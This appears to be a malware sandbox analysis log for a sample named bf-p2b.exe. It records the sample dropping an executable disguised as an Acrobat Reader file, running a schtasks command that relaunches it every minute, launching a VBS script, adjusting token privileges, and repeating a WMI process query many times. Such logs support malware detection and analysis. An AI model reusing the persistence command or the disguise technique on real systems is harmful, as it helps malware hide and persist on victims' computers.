Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3F594 GetWindowLongW,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEB7F2 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEB845 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3EA4E NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00F3ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEAC99 NtdllDialogWndProc_W
Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe | Code function: 5_2_00EEAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3FE80 NtdllDialogWndProc_W,5_2_00F3FE80
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEAFB4 GetParent,NtdllDialogWndProc_W,5_2_00EEAFB4
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,5_2_00F3EFA8
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,5_2_00F3FF91
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,5_2_00F3FF04
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B470AE: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B470AE
                Source: C:\Users\user\Desktop\bf-p2b.exeFile read: C:\Users\user\Desktop\bf-p2b.exeJump to behavior
                Source: C:\Users\user\Desktop\bf-p2b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\bf-p2b.exe C:\Users\user\Desktop\bf-p2b.exe
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\bf-p2b.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                Source: C:\Users\user\Desktop\bf-p2b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                Source: JWPING.lnk.0.dr LNK file: ..\..\..\..\..\Windata\Softwarefx-Acrobat-Reader.exe
                Source: C:\Users\user\Desktop\bf-p2b.exe Code function: 0_2_00B3B8B0 AdjustTokenPrivileges,CloseHandle,0_2_00B3B8B0
                Source: C:\Users\user\Desktop\bf-p2b.exe Code function: 0_2_00B3BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B3BEC3
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe Code function: 5_2_00F0B8B0 AdjustTokenPrivileges,CloseHandle,5_2_00F0B8B0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe Code function: 5_2_00F0BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00F0BEC3
                Source: C:\Windows\SysWOW64\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'bf-p2b.exe'
